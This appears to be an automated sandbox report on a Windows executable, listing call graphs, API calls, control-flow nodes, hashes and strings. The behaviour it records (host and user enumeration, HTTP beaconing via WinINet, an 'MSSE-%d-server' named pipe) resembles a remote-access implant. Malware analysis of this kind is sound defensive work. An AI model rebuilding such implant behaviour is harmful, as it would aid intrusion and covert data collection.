114 API calls 16 library calls 37335->37347 37337->37328 37338->37327 37340 cf94bb 37339->37340 37344 cf9402 _DllMainCRTStartup 37339->37344 37416 cfb47c 37340->37416 37342 cf9407 _DllMainCRTStartup 37342->37330 37344->37342 37345 cf9477 _DllMainCRTStartup 37344->37345 37346 cf946b HeapDestroy 37344->37346 37349 ceca74 37345->37349 37346->37345 37347->37332 37348->37326 37437 cf5fec 37349->37437 37351 ceca92 _DllMainCRTStartup 37444 cff284 37351->37444 37353 cecb40 _DllMainCRTStartup 37461 cfc230 37353->37461 37359 cecbb5 37360 cfeaa8 _DllMainCRTStartup 54 API calls 37359->37360 37361 cecbcf 37360->37361 37486 cef3c0 37361->37486 37364 cecbd8 37547 cfda74 58 API calls _DllMainCRTStartup 37364->37547 37366 cecbdd _DllMainCRTStartup 37367 cecbf9 37366->37367 37368 cecbf4 37366->37368 37491 cef1f8 37367->37491 37548 cfda74 58 API calls _DllMainCRTStartup 37368->37548 37372 cecc0e 37497 cef274 37372->37497 37373 cecc09 37549 cfda74 58 API calls _DllMainCRTStartup 37373->37549 37377 cecc17 37550 cfda74 58 API calls _DllMainCRTStartup 37377->37550 37379 cecc1c _DllMainCRTStartup 37380 cff284 malloc 52 API calls 37379->37380 37381 cecc4f 37380->37381 37382 cecc5c _DllMainCRTStartup 37381->37382 37383 cecc57 37381->37383 37385 cfeaa8 _DllMainCRTStartup 54 API calls 37382->37385 37551 cfda74 58 API calls _DllMainCRTStartup 37383->37551 37386 cecc78 _DllMainCRTStartup 37385->37386 37509 cf5c60 GetACP GetOEMCP 37386->37509 37417 cf5fec _DllMainCRTStartup 52 API calls 37416->37417 37418 cfb4a0 _wctomb_s_l _DllMainCRTStartup 37417->37418 37419 cff284 malloc 52 API calls 37418->37419 37420 cfb52d _wctomb_s_l 37419->37420 37421 cfeaa8 _DllMainCRTStartup 54 API calls 37420->37421 37422 cfb55e _DllMainCRTStartup 37421->37422 37424 cfb575 _DllMainCRTStartup 37422->37424 37679 cef014 37422->37679 37425 cfb5d7 GetComputerNameExA 37424->37425 37426 cfb5ff _DllMainCRTStartup 37424->37426 37425->37426 37427 cfb634 _DllMainCRTStartup 37426->37427 37428 cfb611 GetComputerNameA 37426->37428 37430 cfb646 GetUserNameA 37427->37430 37435 cfb676 GetPdbDllFromInstallPath _DllMainCRTStartup 37427->37435 37684 cfbaa8 _DllMainCRTStartup 37428->37684 37430->37435 37431 cfb802 37685 cf60e0 52 API calls 2 library calls 37431->37685 37434 cff284 malloc 52 API calls 37434->37435 37435->37431 37435->37434 37436 cfeaa8 _DllMainCRTStartup 54 API calls 37435->37436 37436->37435 37438 cff284 malloc 52 API calls 37437->37438 37439 cf600d 37438->37439 37440 cf6015 _wctomb_s_l _DllMainCRTStartup 37439->37440 37441 cff284 malloc 52 API calls 37439->37441 37440->37351 37442 cf6021 37441->37442 37442->37440 37552 cff244 37442->37552 37445 cff29c 37444->37445 37446 cff318 37444->37446 37449 cff2d4 HeapAlloc 37445->37449 37453 cff2fd 37445->37453 37457 cff2b4 37445->37457 37458 cff302 37445->37458 37561 d01db4 DecodePointer 37445->37561 37564 d01db4 DecodePointer 37446->37564 37448 cff31d 37565 d01d18 52 API calls _getptd_noexit 37448->37565 37449->37445 37451 cff30d 37449->37451 37451->37353 37562 d01d18 52 API calls _getptd_noexit 37453->37562 37457->37449 37558 d01df0 52 API calls 2 library calls 37457->37558 37559 d01e64 52 API calls 7 library calls 37457->37559 37560 cfff54 GetModuleHandleExW GetProcAddress ExitProcess __crtCorExitProcess 37457->37560 37563 d01d18 52 API calls _getptd_noexit 37458->37563 37566 d0145c GetSystemTimeAsFileTime 37461->37566 37466 cff284 malloc 52 API calls 37468 cfc2a1 GetPdbDllFromInstallPath _wctomb_s_l 37466->37468 37469 cfc30a 37468->37469 37571 d0181c 37468->37571 37470 d0181c strtok 55 API calls 37469->37470 37471 cecb87 37470->37471 37472 cf34a0 37471->37472 37473 d0145c _time64 GetSystemTimeAsFileTime 37472->37473 37474 cf34b3 37473->37474 37475 d0044c _DllMainCRTStartup 52 API calls 37474->37475 37476 cf34bb _DllMainCRTStartup 37475->37476 37615 cf2f5c 37476->37615 37479 cfeaa8 37480 cfeafd _wctomb_s_l 37479->37480 37481 cfeae7 37479->37481 37480->37359 37482 cfeaff 37481->37482 37483 cfeaf3 37481->37483 37620 d01914 54 API calls 5 library calls 37482->37620 37484 cff284 malloc 52 API calls 37483->37484 37484->37480 37487 cef3d4 _DllMainCRTStartup 37486->37487 37488 cef3da GetLocalTime 37487->37488 37489 cecbd4 37487->37489 37490 cef408 _DllMainCRTStartup 37488->37490 37489->37364 37489->37366 37490->37489 37492 cef20e _DllMainCRTStartup 37491->37492 37493 cecc05 37492->37493 37621 cfa8dc 73 API calls _DllMainCRTStartup 37492->37621 37493->37372 37493->37373 37495 cef248 37622 cfa914 73 API calls 3 library calls 37495->37622 37499 cef299 _DllMainCRTStartup 37497->37499 37498 cecc13 37498->37377 37498->37379 37499->37498 37500 cef2eb htonl htonl 37499->37500 37500->37498 37501 cef30b 37500->37501 37502 cff284 malloc 52 API calls 37501->37502 37503 cef315 GetPdbDllFromInstallPath _DllMainCRTStartup 37502->37503 37504 cef36b _wctomb_s_l 37503->37504 37623 cfa8dc 73 API calls _DllMainCRTStartup 37503->37623 37507 cff244 free 52 API calls 37504->37507 37506 cef34c 37624 cfa914 73 API calls 3 library calls 37506->37624 37507->37498 37625 ce1218 37509->37625 37513 cf5ca8 GetCurrentProcessId 37514 cf5cb6 _DllMainCRTStartup 37513->37514 37515 d0044c _DllMainCRTStartup 52 API calls 37514->37515 37516 cf5cbf 37515->37516 37631 cecfa4 5 API calls _DllMainCRTStartup 37516->37631 37518 cf5cc4 _DllMainCRTStartup 37519 cf5cfe 37518->37519 37520 cf5cec _DllMainCRTStartup 37518->37520 37632 cfdec8 AllocateAndInitializeSid CheckTokenMembership FreeSid 37519->37632 37668 cf0c64 GetModuleHandleA GetProcAddress 37520->37668 37523 cf5d06 37633 cee2a8 htonl htonl 37523->37633 37524 cf5cfa 37524->37519 37526 cf5d1c 37634 cee200 htonl GetPdbDllFromInstallPath 37526->37634 37528 cf5d2f 37635 cee200 htonl GetPdbDllFromInstallPath 37528->37635 37530 cf5d3f 37636 cee200 htonl GetPdbDllFromInstallPath 37530->37636 37532 cf5d4f 37637 cee248 htonl htonl _DllMainCRTStartup 37532->37637 37534 cf5d5e GetCurrentProcessId 37638 cee248 htonl htonl _DllMainCRTStartup 37534->37638 37536 cf5d6f 37639 cee278 htonl _DllMainCRTStartup 37536->37639 37538 cf5d7a 37640 cee1e0 htonl _DllMainCRTStartup 37538->37640 37540 cf5d85 37641 cf5e28 37540->37641 37553 cff249 _chsize_nolock 37552->37553 37556 cff279 free 37552->37556 37553->37556 37557 d01d18 52 API calls _getptd_noexit 37553->37557 37555 cff269 GetLastError 37555->37556 37556->37440 37557->37555 37558->37457 37559->37457 37561->37445 37562->37458 37563->37451 37564->37448 37565->37451 37567 cfc259 37566->37567 37568 d0044c 37567->37568 37580 d05844 37568->37580 37572 d05844 _getptd 52 API calls 37571->37572 37573 d01840 37572->37573 37574 d0190e 37573->37574 37577 d01861 37573->37577 37612 d08c50 5 API calls __report_securityfailure 37574->37612 37576 d01913 37603 d07e20 37577->37603 37585 d05868 GetLastError 37580->37585 37582 d0584f 37583 cfc261 37582->37583 37599 d000b4 52 API calls 3 library calls 37582->37599 37583->37466 37600 d040a8 37585->37600 37587 d05885 37588 d058d4 SetLastError 37587->37588 37589 d0588d 37587->37589 37588->37582 37590 d04728 _calloc_crt 50 API calls 37589->37590 37591 d0589a 37590->37591 37591->37588 37592 d040c4 _freeptd TlsSetValue 37591->37592 37593 d058b0 37592->37593 37594 d058b7 37593->37594 37595 d058cd 37593->37595 37596 d058ec _initptd 50 API calls 37594->37596 37597 cff244 free 50 API calls 37595->37597 37598 d058be _getptd_noexit 37596->37598 37597->37598 37598->37588 37601 d040b8 37600->37601 37602 d040bb TlsGetValue 37600->37602 37601->37602 37604 d07e29 37603->37604 37605 d01903 37604->37605 37606 d08b7c IsProcessorFeaturePresent 37604->37606 37605->37468 37607 d08b93 37606->37607 37613 d03ffc RtlCaptureContext RtlVirtualUnwind __crtCapturePreviousContext 37607->37613 37609 d08ba6 37614 d08b30 UnhandledExceptionFilter IsDebuggerPresent __crtUnhandledException _call_reportfault 37609->37614 37612->37576 37613->37609 37616 cecb94 37615->37616 37618 cf2f87 _DllMainCRTStartup 37615->37618 37616->37479 37617 cff284 malloc 52 API calls 37617->37618 37618->37616 37618->37617 37619 cfeaa8 _DllMainCRTStartup 54 API calls 37618->37619 37619->37618 37620->37480 37621->37495 37622->37493 37623->37506 37624->37504 37671 ce1184 CryptAcquireContextA 37625->37671 37628 ce1245 37630 cfb0b4 52 API calls _DllMainCRTStartup 37628->37630 37630->37513 37631->37518 37632->37523 37633->37526 37634->37528 37635->37530 37636->37532 37637->37534 37638->37536 37639->37538 37640->37540 37642 cf5fec _DllMainCRTStartup 52 API calls 37641->37642 37643 cf5e51 _DllMainCRTStartup 37642->37643 37644 cf5e9f GetUserNameA GetComputerNameA 37643->37644 37678 cef008 37644->37678 37668->37524 37672 ce11e6 CryptGenRandom 37671->37672 37673 ce11c2 CryptAcquireContextA 37671->37673 37675 ce11fd CryptReleaseContext 37672->37675 37676 ce11fb 37672->37676 37673->37672 37674 ce120c 37673->37674 37674->37628 37677 ce10d0 GetSystemTimeAsFileTime clock 37674->37677 37675->37674 37676->37675 37677->37628 37686 cef118 37679->37686 37681 cef02f WSASocketA 37682 cef058 WSAIoctl 37681->37682 37683 cef051 _DllMainCRTStartup 37681->37683 37682->37683 37683->37424 37684->37427 37687 cef12c _DllMainCRTStartup 37686->37687 37690 cef144 _DllMainCRTStartup 37686->37690 37688 cef1d2 WSACleanup 37687->37688 37687->37690 37689 cef1e2 _DllMainCRTStartup 37688->37689 37690->37681 37691 d09cec 37692 d09d01 37691->37692 37697 d09d1e 37691->37697 37693 d09d0f 37692->37693 37692->37697 37699 d01d18 52 API calls _getptd_noexit 37693->37699 37695 d09d36 HeapAlloc 37696 d09d14 37695->37696 37695->37697 37697->37695 37697->37696 37700 d01db4 DecodePointer 37697->37700 37699->37696 37700->37697

                        Executed Functions

                        Function 00401180 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 196sleepstringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 10 401180-4011ae 11 401460-401463 GetStartupInfoA 10->11 12 4011b4-4011d1 10->12 16 401470-40148a call 402e88 11->16 13 4011e9-4011f4 12->13 14 4011f6-401204 13->14 15 4011d8-4011db 13->15 19 401417-401426 call 402e90 14->19 20 40120a-40120e 14->20 17 401400-401411 15->17 18 4011e1-4011e6 Sleep 15->18 17->19 17->20 18->13 27 401229-40122b 19->27 28 40142c-401447 _initterm 19->28 23 401490-4014a9 call 402e80 20->23 24 401214-401223 20->24 35 4014ae-4014b6 call 402e60 23->35 24->27 24->28 30 401231-40123e 27->30 31 40144d-401452 27->31 28->30 28->31 33 401240-401248 30->33 34 40124c-401299 call 401fd0 SetUnhandledExceptionFilter call 4024e0 call 402ef0 call 401d40 call 402f00 30->34 31->30 33->34 48 4012b2-4012b8 34->48 49 40129b 34->49 51 4012a0-4012a2 48->51 52 4012ba-4012c8 48->52 50 4012f0-4012f6 49->50 53 4012f8-401302 50->53 54 40130e-401333 malloc 50->54 55 4012a4-4012a7 51->55 56 4012e9 51->56 57 4012ae 52->57 58 4013f0-4013f5 53->58 59 401308 53->59 60 401335-40133a 54->60 61 40137b-4013af call 401950 call 403040 54->61 62 4012d0-4012d2 55->62 63 4012a9 55->63 56->50 57->48 58->59 59->54 64 401340-401374 strlen malloc memcpy 60->64 72 4013b4-4013c2 61->72 62->56 66 4012d4 62->66 63->57 64->64 68 401376 64->68 67 4012d8-4012e2 66->67 67->56 70 4012e4-4012e7 67->70 68->61 70->56 70->67 72->35 73 4013c8-4013d0 72->73 73->16 74 4013d6-4013e5 73->74
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                        • String ID: 0PE$@6E$DCE
                        • API String ID: 649803965-2430247936
                        • Opcode ID: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                        • Instruction ID: 7b6093c48930a8ef89593839c944e9f908a2e32032a5f35aeb8b435f34b377a6
                        • Opcode Fuzzy Hash: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                        • Instruction Fuzzy Hash: 5C71ADB5601B0486EB259F56E89476A33A1B745BCAF84803BEF49673E6DF7CC844C348
                        Function 00CEE68C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 165networkfileCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 75 cee68c-cee75a call cff530 * 2 call cf83d0 call cff63c call cfb454 call cf7b38 88 cee75c-cee78b call cf2d70 call cf2c0c 75->88 89 cee790-cee799 75->89 88->89 91 cee79c-cee7a3 89->91 91->91 93 cee7a5-cee7b0 91->93 95 cee7c4-cee7d4 call cff63c 93->95 96 cee7b2-cee7c2 call cff63c 93->96 100 cee7d9-cee82e call cfb454 call d12570 call cee918 95->100 96->100 107 cee831-cee838 100->107 107->107 108 cee83a-cee868 call d12580 call cf83c4 call ceefbc 107->108 115 cee86a-cee882 call d12550 108->115 116 cee895-cee898 call d12540 108->116 115->116 122 cee884-cee88d 115->122 119 cee89e 116->119 121 cee8a0-cee8bb 119->121 122->116 123 cee88f-cee891 122->123 124 cee8bc-cee8bf 123->124 125 cee893 123->125 124->116 126 cee8c1-cee8dc call d12538 124->126 125->116 129 cee8de-cee8e4 126->129 130 cee8ed-cee8f0 126->130 129->130 131 cee8e6-cee8eb 129->131 130->116 132 cee8f2-cee916 call d12540 call cfb454 call cf846c 130->132 131->126 131->130 132->121
                        APIs
                        • _snprintf.LIBCMT ref: 00CEE725
                          • Part of subcall function 00CFF63C: _errno.LIBCMT ref: 00CFF673
                          • Part of subcall function 00CFF63C: _invalid_parameter_noinfo.LIBCMT ref: 00CFF67E
                          • Part of subcall function 00CF7B38: _snprintf.LIBCMT ref: 00CF7CA5
                        • _snprintf.LIBCMT ref: 00CEE7BD
                        • _snprintf.LIBCMT ref: 00CEE7D4
                        • HttpOpenRequestA.WININET ref: 00CEE818
                        • HttpSendRequestA.WININET ref: 00CEE84A
                        • InternetQueryDataAvailable.WININET ref: 00CEE87A
                        • InternetCloseHandle.WININET ref: 00CEE898
                          • Part of subcall function 00CF2D70: strchr.LIBCMT ref: 00CF2DD6
                          • Part of subcall function 00CF2D70: _snprintf.LIBCMT ref: 00CF2E0C
                          • Part of subcall function 00CF2C0C: strchr.LIBCMT ref: 00CF2C69
                          • Part of subcall function 00CF2C0C: _snprintf.LIBCMT ref: 00CF2CB3
                        • InternetReadFile.WININET ref: 00CEE8D4
                        • InternetCloseHandle.WININET ref: 00CEE8F5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                        • String ID: %s%s$*/*
                        • API String ID: 3536628738-856325523
                        • Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                        • Instruction ID: 3c33c4bdd10bf315787bcc3b60fd5b053ff34e91b01ee815575f0990f3dba3b2
                        • Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                        • Instruction Fuzzy Hash: B961C032700AC496EB10DFA6E4907AEB7A5F784BD8F400126EE4D57B98DF38C50AC710
                        Function 00CF5E28 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116stringCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                        • String ID: %s%s%s
                        • API String ID: 1671524875-1891519693
                        • Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                        • Instruction ID: ba1005f0a257a5623b157b22ee465aba6d2e42968e23a24454a40abcfc7ff958
                        • Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                        • Instruction Fuzzy Hash: 7641D03470468446EA08FB63A8147BFA791BB89FD0F484125BF560BB6ACF3CC142C700
                        Function 00CE1184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39encryptionCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 184 ce1184-ce11c0 CryptAcquireContextA 185 ce11e6-ce11f9 CryptGenRandom 184->185 186 ce11c2-ce11e4 CryptAcquireContextA 184->186 188 ce11fd-ce120a CryptReleaseContext 185->188 189 ce11fb 185->189 186->185 187 ce120c-ce1216 186->187 188->187 189->188
                        APIs
                        • CryptAcquireContextA.ADVAPI32 ref: 00CE11B8
                        • CryptAcquireContextA.ADVAPI32 ref: 00CE11DC
                        • CryptGenRandom.ADVAPI32 ref: 00CE11F0
                        • CryptReleaseContext.ADVAPI32 ref: 00CE1204
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$Context$Acquire$RandomRelease
                        • String ID: ($Microsoft Base Cryptographic Provider v1.0
                        • API String ID: 685801729-4046902070
                        • Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                        • Instruction ID: 03d214cb8547c24239f498d5041069a6b72171af34762df9bbd8d6b2ca2ea671
                        • Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                        • Instruction Fuzzy Hash: E301887570074092E710CFA6E8887A9B772F7DCB84F488526DB5983764CF78C659C750
                        Function 00401630 Relevance: 6.0, APIs: 4, Instructions: 50pipefileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 408 401630-40168d CreateNamedPipeA 409 4016dc-4016e5 408->409 410 40168f-4016a1 ConnectNamedPipe 408->410 410->409 411 4016a3-4016a5 410->411 412 4016c6-4016cf CloseHandle 411->412 413 4016a7-4016c4 WriteFile 411->413 412->409 413->412 414 4016d1-4016da 413->414 414->411
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                        • String ID:
                        • API String ID: 2239253087-0
                        • Opcode ID: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                        • Instruction ID: 33ab9d0585ac1679f1025b945fed68b18b66da774309cd2c41c4043231b0423c
                        • Opcode Fuzzy Hash: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                        • Instruction Fuzzy Hash: 431182A1714A5047E7208B12EC4870AB660B785BEAF548635EE5D1BBE4DB7DC445CB08
                        Function 004017F8 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 54threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • malloc.MSVCRT ref: 004017B9
                        • SleepEx.KERNELBASE ref: 004017CD
                          • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                          • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                          • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                        • GetTickCount.KERNEL32 ref: 004017FC
                        • CreateThread.KERNEL32 ref: 00401885
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                        • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
                        • API String ID: 3660650057-1020837823
                        • Opcode ID: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                        • Instruction ID: b345380edbdca45ebb9784712c11a19872ab0759f856dd5cf37371eb7f92d9a3
                        • Opcode Fuzzy Hash: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                        • Instruction Fuzzy Hash: 6A11DFB2214A80C7E714CF62FC4575ABBA0F3C478AF44412AEB091B7A8CB7CC545CB08
                        Function 00CEEA48 Relevance: 9.1, APIs: 6, Instructions: 109networkCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00CFE0FC: RevertToSelf.ADVAPI32 ref: 00CFE10A
                        • InternetOpenA.WININET ref: 00CEEB0C
                        • InternetSetOptionA.WININET ref: 00CEEB2C
                        • InternetSetOptionA.WININET ref: 00CEEB44
                        • InternetConnectA.WININET ref: 00CEEB7A
                        • InternetSetOptionA.WININET ref: 00CEEBB7
                        • InternetSetOptionA.WININET ref: 00CEEBE2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$Option$ConnectOpenRevertSelf
                        • String ID:
                        • API String ID: 1513466045-0
                        • Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                        • Instruction ID: 213d48b8f6ed84c79f097d72eb16b7555d886a3f190adafa9b81492049f92bc3
                        • Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                        • Instruction Fuzzy Hash: A541123520078582EB14EB92F4A5BB9BB62F794B88F00401ADA4A07B26CF3CC917D715
                        Function 00CECA74 Relevance: 7.8, APIs: 6, Instructions: 296COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 237 ceca74-cecbd6 call cf5fec call cf61e8 * 3 call cfb454 call cfb464 * 2 call cfb434 * 2 call cfb454 * 2 call cff284 call cfb434 * 3 call cfb464 call cfc230 call cf34a0 call cfeaa8 * 2 call cef3c0 280 cecbdd-cecbf2 call cfb434 call cef1e4 237->280 281 cecbd8 call cfda74 237->281 287 cecbf9-cecc07 call cef1f8 280->287 288 cecbf4 call cfda74 280->288 281->280 292 cecc0e-cecc15 call cef274 287->292 293 cecc09 call cfda74 287->293 288->287 297 cecc1c-cecc55 call cfb464 call cfb434 call cff284 292->297 298 cecc17 call cfda74 292->298 293->292 306 cecc5c-cecc90 call cfb434 call cfeaa8 call cfb434 call cf5c60 297->306 307 cecc57 call cfda74 297->307 298->297 317 cecebb-cecee7 call cfc218 call cff244 call cfda74 306->317 318 cecc96-cecc9d 306->318 307->306 319 cecca2-cecd24 call cfbfc0 call cff63c call cfbfc0 call cff63c * 2 call cf2ee0 318->319 338 cecd26-cecd2a 319->338 339 cecd44-cecd77 call ceea48 call cfb434 call cee9f4 319->339 340 cecd2e-cecd35 338->340 350 cecd9c-cecd9f 339->350 351 cecd79-cecd87 call cfad44 339->351 340->340 342 cecd37-cecd3a 340->342 342->339 344 cecd3c-cecd3f call cf31f4 342->344 344->339 353 cece26 350->353 354 cecda5-cecdc8 call cf6b98 call cfb434 350->354 358 cecd89-cecd93 call cf8e0c 351->358 359 cecd95-cecd98 351->359 356 cece2c-cece38 call cee9c8 call cef3c0 353->356 369 cecdcf-cecdf0 call cf18c4 call cf5144 call cf4a04 call cef3c0 354->369 370 cecdca 354->370 372 cece3f-cece5d call cfbf04 356->372 373 cece3a call cfda74 356->373 358->350 359->350 398 cecdfa-cece01 369->398 399 cecdf2-cecdf5 call cef484 369->399 370->369 380 cece5f call cfda74 372->380 381 cece64-cece6c 372->381 373->372 380->381 381->317 382 cece6e-cece76 381->382 385 cece78-cece89 382->385 386 cecea4 call cf211c 382->386 388 cece9c 385->388 389 cece8b-cece9a call cef3a0 385->389 395 cecea9-ceceb5 386->395 393 cece9e-cecea0 388->393 389->393 393->386 397 cecea2 393->397 395->317 395->319 397->386 398->356 401 cece03-cece24 call cee9c8 call ceea48 call ceec04 398->401 399->398 401->356
                        APIs
                          • Part of subcall function 00CF5FEC: malloc.LIBCMT ref: 00CF6008
                        • malloc.LIBCMT ref: 00CECB3B
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                          • Part of subcall function 00CFC230: _time64.LIBCMT ref: 00CFC254
                          • Part of subcall function 00CFC230: malloc.LIBCMT ref: 00CFC29C
                          • Part of subcall function 00CFC230: strtok.LIBCMT ref: 00CFC300
                          • Part of subcall function 00CFC230: strtok.LIBCMT ref: 00CFC311
                          • Part of subcall function 00CF34A0: _time64.LIBCMT ref: 00CF34AE
                          • Part of subcall function 00CFEAA8: malloc.LIBCMT ref: 00CFEAF8
                          • Part of subcall function 00CFEAA8: realloc.LIBCMT ref: 00CFEB07
                          • Part of subcall function 00CEF3C0: GetLocalTime.KERNEL32 ref: 00CEF3DF
                        • malloc.LIBCMT ref: 00CECC4A
                        • _snprintf.LIBCMT ref: 00CECCC1
                        • _snprintf.LIBCMT ref: 00CECCE7
                        • free.LIBCMT ref: 00CECEC6
                          • Part of subcall function 00CFAD44: malloc.LIBCMT ref: 00CFAD78
                          • Part of subcall function 00CFAD44: free.LIBCMT ref: 00CFAF2F
                          • Part of subcall function 00CF8E0C: htonl.WS2_32 ref: 00CF8E3D
                          • Part of subcall function 00CF8E0C: htonl.WS2_32 ref: 00CF8E4A
                        • _snprintf.LIBCMT ref: 00CECD0E
                          • Part of subcall function 00CFDA74: Sleep.KERNEL32 ref: 00CFDABC
                          • Part of subcall function 00CFDA74: ExitThread.KERNEL32 ref: 00CFDAC6
                        Memory Dump Source
